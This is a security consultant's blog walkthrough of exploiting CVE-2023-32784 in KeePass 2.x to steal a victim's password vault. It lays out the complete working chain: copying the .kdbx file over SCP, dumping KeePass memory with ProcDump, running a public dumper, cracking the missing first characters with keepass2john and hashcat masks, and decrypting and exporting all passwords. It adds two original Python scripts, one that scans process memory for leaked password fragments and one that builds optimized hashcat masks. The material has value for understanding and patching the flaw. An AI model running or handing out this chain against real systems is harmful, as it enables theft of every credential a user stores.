
chancej715

Security Consultant

Introduction

Versions 2.x before 2.54 of the popular password manager KeePass contain vulnerability CVE-2023-32784, which allows an attacker to extract the master password from the application’s memory. BleepingComputer wrote a great article about this vulnerability which you can read here. The fix is in version 2.54, which as of writing has not been released.

Password managers such as KeePass allow users to store all of their passwords in a single password database which is encrypted using a master password. If an attacker can obtain this master password, they can then decrypt the password database, thus gaining access to all of the passwords stored in the database.

In this post, I will demonstrate how to exploit this vulnerability to obtain a victim user’s KeePass password database master password from a process memory dump, and use it to recover all of the plain-text passwords from the database. The victim is running a Windows 11 machine with KeePass version 2.53.1 installed. I will be using a Debian-based distribution to attack the machine.

Post Structure

  • Obtain encrypted KeePass password database and KeePass process memory dump from victim machine.
  • Extract master password from memory dump.
  • Use extracted master password to decrypt victim’s KeePass password database.

Password Database and Memory Dump

The security researcher who discovered the vulnerability goes by the handle vdohney. They released a proof-of-concept tool that recovers the password from a memory dump; the repository is cloned further down in this post. The best part is that you do not need to be an administrative user to acquire the KeePass process memory dump: a user can dump any process running under their own account, so being logged in as the user that owns the KeePass process is enough.

Password Database

In this example, I am logged in via SSH to the Windows machine as the victim user bob. The first thing I want to do is locate this user’s encrypted KeePass database file and transfer it back to my local machine.

In Windows, KeePass password databases are created under the user’s Documents directory by default. I will check there first (in a cmd.exe session the profile directory is %USERPROFILE%; %HOME% is not set on Windows by default):

dir %USERPROFILE%\Documents

The output tells me there is a file named Database.kdbx. This is the KeePass encrypted password database file. In a separate terminal on my local Debian machine, I will create a copy of this file:

scp bob@192.168.1.10:"/C:/Users/bob/Documents/Database.kdbx" .

Memory Dump

Now that I have a copy of the encrypted password database, it’s time to acquire a memory dump of the KeePass process which I can use to extract the master password. There are a variety of ways this can be done, but for this example I will use the Sysinternals ProcDump utility to get a memory dump of the KeePass process.

Assuming the ProcDump executable is available on the victim machine, I will execute the following command in the SSH session. The -ma switch writes a full memory dump (all of the process’s memory), which is what the recovery tool needs; -accepteula suppresses the licence prompt ProcDump shows on first run:

procdump -accepteula -ma KeePass

The memory dump file is saved as KeePass.exe_230521_121957.dmp in the current directory. First I’ll move this file to the bob user’s Documents directory:

move KeePass.exe_230521_121957.dmp %USERPROFILE%\Documents

In a separate terminal on my Debian machine, I will create a local copy of this file in my home directory:

scp bob@192.168.1.10:"/C:/Users/bob/Documents/KeePass.exe_230521_121957.dmp" .

Now I’ll clone the proof of concept tool for this vulnerability which I will use to extract the password from the dump file:

git clone https://github.com/vdohney/keepass-password-dumper.git

I’ll change directories into the newly cloned repo and execute the following command to extract the master password from the KeePass process dump (the tool is a .NET project, so the .NET SDK must be installed for dotnet run to build and run it):

dotnet run ~/KeePass.exe_230521_121957.dmp

The last line of output shows what the tool recovered: ● marks a character it could not see at all, and braces enclose the candidates for a position it could not pin down to a single character:

Combined: ●{i, N, c, d, e, f, g, -, #, W, X, C, 0, ;}verpool12

The recovered tail of the password is verpool12. I will first try it as-is against the Database.kdbx password database. First I’ll install KeePass on my Debian machine:

sudo apt install keepass2

Next I start the program:

keepass2

In the application window, I navigate to File > Open > Open File… > select the Database.kdbx file, and enter the extracted password verpool12:

[Screenshot: KeePass "Enter Master Key" dialog]

However, the password does not work!

[Screenshot: KeePass master password error]

What’s the deal? The README file of this tool explains that it is able to recover most of the password, not all of it. The reason is in how the leak works: KeePass’s password text box (SecureTextBoxEx) leaves a leftover string in memory for every character typed, made up of the mask character ● repeated once for each character typed so far, followed by the character that was just typed. No string of that shape is created for the first keystroke, so the first character never appears, and the second character has to be found from a two-character pattern (one ● plus one character) that matches a lot of unrelated memory, hence the long candidate list in braces. The demonstration in the BleepingComputer article about this vulnerability likewise showed they were not able to recover the first two characters of the password. Therefore, some more work needs to be done.
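To make the dumper’s output concrete, here is an added example (my own Python, not vdohney’s tool and not from the original post) that re-implements the leftover-string scan. It looks for the UTF-16LE encoding of a run of ● followed by one character, assigns that character to position n+1 where n is the run length, and renders the result the way the tool’s Combined: line does. The pattern follows the tool’s README; the exact layout of .NET string objects in a real dump (object headers, alignment) is not modelled. It runs against a constructed byte buffer standing in for the dump, so it works offline; the filler bytes and the stray ●N planted in that buffer are assumptions made to show where the first-character gap and a position-two false positive come from.

```python
from __future__ import annotations

import re
from collections import defaultdict

# "●" (U+25CF), the mask character SecureTextBoxEx shows, as it is stored in
# a .NET string in memory (UTF-16LE): bytes CF 25.
BULLET = "\u25cf".encode("utf-16-le")

# Shape of a leftover string: a maximal run of bullets (not preceded or
# followed by another bullet) and then exactly one UTF-16LE code unit.
_LEFTOVER = re.compile(rb"(?<!\xcf\x25)((?:\xcf\x25)+)(?!\xcf\x25)(..)", re.DOTALL)


def find_candidates(dump: bytes) -> dict[int, list[str]]:
    """Scan a raw memory image for leftover strings.

    Returns {position: [candidate characters]} with 1-based positions. A
    leftover string with n bullets reveals the character at position n + 1,
    so position 1 is never reported: that is the character the real dumper
    cannot recover either.
    """
    found: dict[int, list[str]] = defaultdict(list)
    for m in _LEFTOVER.finditer(dump):
        position = len(m.group(1)) // 2 + 1
        ch = m.group(2).decode("utf-16-le", errors="replace")
        if ch == "\ufffd" or not ch.isprintable():
            continue  # bytes after a bullet run that are not a typed character
        if ch not in found[position]:
            found[position].append(ch)
    return dict(found)


def combine(found: dict[int, list[str]]) -> str:
    """Render candidates like the dumper's "Combined:" line: ● for a position
    with no candidates, {a, b} where several characters were seen."""
    if not found:
        return ""
    out = []
    for pos in range(1, max(found) + 1):
        cands = found.get(pos, [])
        if len(cands) == 1:
            out.append(cands[0])
        elif cands:
            out.append("{" + ", ".join(cands) + "}")
        else:
            out.append("\u25cf")
    return "".join(out)


def build_sample_dump(password: str) -> bytes:
    """Constructed stand-in for a process dump (not a real KeePass image):
    the leftover strings typing `password` leaves behind, separated by
    filler, plus one stray "●N" to produce a false positive on position 2."""
    filler = b"\x00\x00\x41\x42\x00\x00"  # arbitrary bytes, not a real artefact
    parts = []
    for k in range(2, len(password) + 1):
        leftover = "\u25cf" * (k - 1) + password[k - 1]
        parts.append(leftover.encode("utf-16-le"))
        parts.append(filler)
    parts.append(("\u25cf" + "N").encode("utf-16-le"))  # planted noise hit
    parts.append(filler)
    return b"".join(parts)


if __name__ == "__main__":
    found = find_candidates(build_sample_dump("liverpool12"))
    for pos in sorted(found):
        print(pos, found[pos])
    print("Combined:", combine(found))
```

Run against the constructed buffer this prints Combined: ●{i, N}verpool12: the first character is missing because nothing in memory ever has the shape "zero bullets then a character", and position two picks up the planted noise because a single ● followed by any printable character is a very weak signature. On a real dump you would read the file with open(path, "rb").read() and pass those bytes to find_candidates.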

I will use hashcat to recover the rest of the password. First, I create a hash of the encrypted password database file with keepass2john (shipped with John the Ripper), which pulls the header fields hashcat needs out of the .kdbx file:

keepass2john Database.kdbx > keepasshash

keepass2john prefixes the hash with the database name and a colon. Remove that prefix so that only the hash is left:

cut -d ':' -f 2 keepasshash > hash_only

Confirm the new file contains only the hash:

cat hash_only

$keepass$*2*60000*0*358a9a5ff02c3e09dcc683819e1deb83150804692b589703bcde237d1a897be3*60da2aec5b214d4d59129400110e171aa4fecb80fe7dcd172573f1892ae59387*7ec5c4a9c9a79ce89e509e993911a69a*44abc679d3f754bab18021f500b9b2b4421ec0ac0cef139a3dc5c0c2c85d594c*d6c0ca300fdfc7dc33b2d495cb89dcaf0dde9a9d83b324cac2deed56822af532

Now it’s time to crack the hash. A wordlist attack is an option and may work, but the dumper has already handed over everything except the first character (and a candidate list for the second), so a mask attack with hashcat is the natural fit. Because the recovered part is verpool12, I am going to assume the missing character(s) at the beginning are lowercase English letters. Two fields in the hash are worth checking first: $keepass$*2*60000*0* means a KDBX 2.x/3.x database with 60000 AES-KDF rounds and AES as the cipher, which is what hashcat mode 13400 handles; a KDBX 4 database using Argon2 is not covered by this mode.

I’ll start by trying one additional lowercase character in front. ?l is hashcat’s built-in lowercase charset, so no custom charset needs to be defined:

hashcat -m 13400 -a 3 -O hash_only ?lverpool12

This didn’t work, so I’ll try again with two:

hashcat -m 13400 -a 3 -O hash_only ?l?lverpool12

And this time it worked! The full password is liverpool12. Obviously this was a pretty bad password, so a lowercase guess was enough. The important point is what the leak does to a strong password: however long and complex it is, the search space collapses to the possibilities for the first character (95 printable ASCII characters at most) multiplied by the dumper’s candidate list for the second, which is trivial work for hashcat. Note also that the candidate list above for position two contains uppercase letters and symbols that my lowercase-only mask would have missed; feeding that list to hashcat as a custom charset is the more reliable approach.
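Turning the dumper’s Combined: line into the tightest possible hashcat command is mechanical, so here it is as an added example (my own Python, not part of the original post or of either tool). It parses the Combined: value quoted above, makes the unknown first position a built-in charset, turns the brace list for position two into a hashcat custom charset (-1), escapes literal ? characters as ?? the way hashcat requires, and reports the resulting keyspace so you can compare it with the lowercase-only masks used above. The hash file name hash_only and mode 13400 are taken from this post; the candidate separator ", " and the assumption that no candidate is itself a comma, space or closing brace are mine.

```python
from __future__ import annotations

import re
import shlex

# Size of each built-in hashcat charset, per hashcat's mask-attack documentation.
CHARSET_SIZE = {"?l": 26, "?u": 26, "?d": 10, "?s": 33, "?a": 95,
                "?h": 16, "?H": 16, "?b": 256}

# The dumper output quoted earlier in this post.
COMBINED_LINE = "Combined: \u25cf{i, N, c, d, e, f, g, -, #, W, X, C, 0, ;}verpool12"

# Tokens of the Combined: format: an unseen position (●), a brace-delimited
# candidate list, or a single recovered character.
_TOKEN = re.compile("\u25cf|\\{([^}]*)\\}|(.)")


def parse_combined(line: str) -> list[list[str] | None]:
    """Split a Combined: line into per-position candidate lists.

    None marks a position the dumper saw nothing for. Assumes candidates are
    separated by ", " and that no candidate is a comma, a space or "}".
    """
    value = line.split("Combined:", 1)[-1].strip()
    positions: list[list[str] | None] = []
    for m in _TOKEN.finditer(value):
        if m.group(1) is not None:
            positions.append([c for c in re.split(r",\s*", m.group(1)) if c])
        elif m.group(2) is not None:
            positions.append([m.group(2)])
        else:
            positions.append(None)
    return positions


def _escape(text: str) -> str:
    # In hashcat masks and custom charsets a literal "?" is written "??".
    return text.replace("?", "??")


def hashcat_argv(positions: list[list[str] | None], unknown: str = "?a",
                 hash_file: str = "hash_only", mode: int = 13400) -> list[str]:
    """Build the hashcat mask-attack command line for the candidate lists.

    Unseen positions get the built-in charset `unknown`; positions with
    several candidates become custom charsets -1..-4 (hashcat's limit).
    """
    custom: list[str] = []
    mask: list[str] = []
    for cands in positions:
        if cands is None:
            mask.append(unknown)
        elif len(cands) == 1:
            mask.append(_escape(cands[0]))
        else:
            if len(custom) == 4:
                raise ValueError("hashcat supports at most four custom charsets")
            custom.append("".join(cands))
            mask.append(f"?{len(custom)}")
    argv = ["hashcat", "-m", str(mode), "-a", "3", "-O"]
    for i, charset in enumerate(custom, start=1):
        argv += [f"-{i}", _escape(charset)]
    argv += [hash_file, "".join(mask)]
    return argv


def keyspace(positions: list[list[str] | None], unknown: str = "?a") -> int:
    """Number of candidate passwords the mask will try."""
    total = 1
    for cands in positions:
        total *= CHARSET_SIZE[unknown] if cands is None else len(cands)
    return total


if __name__ == "__main__":
    pos = parse_combined(COMBINED_LINE)
    print(shlex.join(hashcat_argv(pos)))
    print("keyspace with ?a for the first character:", keyspace(pos))
    print("keyspace with ?l for the first character:", keyspace(pos, "?l"))
```

For the line from this post the script produces hashcat -m 13400 -a 3 -O -1 'iNcdefg-#WXC0;' hash_only '?a?1verpool12' with a keyspace of 1330 candidates (95 × 14), or 364 with ?l for the first character. The two-lowercase mask used above tries 676 candidates yet could not have found a password whose second character was any of N, -, #, W, X, C, 0 or ;, which is why the dumper’s candidate list is worth using as-is.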

Decrypt The Database

Now for the moment of truth. I will start the KeePass program on my Debian host:

keepass2

And again in the application window I navigate to File > Open > Open File… > select the Database.kdbx file. This time I enter the full password liverpool12:

[Screenshot: password database decrypted]

The database is successfully decrypted! At this point, I can navigate to File > Export and export the entire password database, plain-text passwords included, as a CSV file.